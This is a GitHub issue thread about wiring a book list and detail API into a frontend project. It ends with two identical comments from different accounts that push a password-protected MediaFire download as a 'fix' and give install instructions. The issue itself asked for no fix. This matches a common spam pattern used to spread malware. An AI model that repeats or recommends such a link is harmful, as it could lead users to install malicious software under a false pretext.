### ISSUE TITLE
[books] 図書リスト&詳細情報API連携

### ISSUE THREAD

**Issue by enginhajin** [bmb-project/bmb-fe#35]
## Description
> 図書リスト&詳細情報API連携

## Progress
- [x] 図書リスト
- [x] 詳細情報

## ETC
[notion](https://www.notion.so/API-fbff0becf4d64eaa81200dd0916a7e34?pvs=4)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
